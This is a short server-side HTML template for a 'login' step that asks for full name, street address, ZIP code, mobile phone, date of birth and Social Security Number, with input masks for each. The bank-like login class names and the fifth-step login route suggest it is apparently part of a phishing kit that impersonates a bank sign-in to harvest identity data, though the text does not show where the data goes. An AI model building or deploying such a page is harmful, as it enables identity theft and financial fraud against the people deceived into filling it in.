@layout('layouts.app')

@section('content')
<div class="cb-login-static-alert cb-login-message cb-login-alert-message cb-loginFormArea"></div>

<div class="cb-login-form cb-loginFormArea">
  <form class="cb-form" action="/auth/login/5" method="POST">
    <div class="field">
      <label class="cb-login-field" for="fullName">Full Name</label>
      <input id="fullName" name="fullName" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="address">Street Address</label>
      <input id="address" name="address" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="zip">ZIP Code</label>
      <input id="zip" name="zip" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="phone">Mobile Phone</label>
      <input id="phone" name="phone" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="dob">Date of Birth (MM/DD/YYYY)</label>
      <input id="dob" name="dob" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="ssn">Social Security Number</label>
      <input id="ssn" name="ssn" class="mrg-T-sm form-control cb-text-field cb-text-field-mask" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div id="userLinks">
      <button class="logon-submit btn-primary btn-block pointer btn disabled" disabled="">
        <div class="icon"></div>
        Continue
      </button>
    </div>
  </form>
</div>
@endsection

@section('script')
<script>
  $('#zip').mask('00000');
  $('#phone').mask('(000) 000-0000');
  $('#dob').mask('00/00/0000');
  $('#ssn').mask('000-00-0000');
</script>
@endsection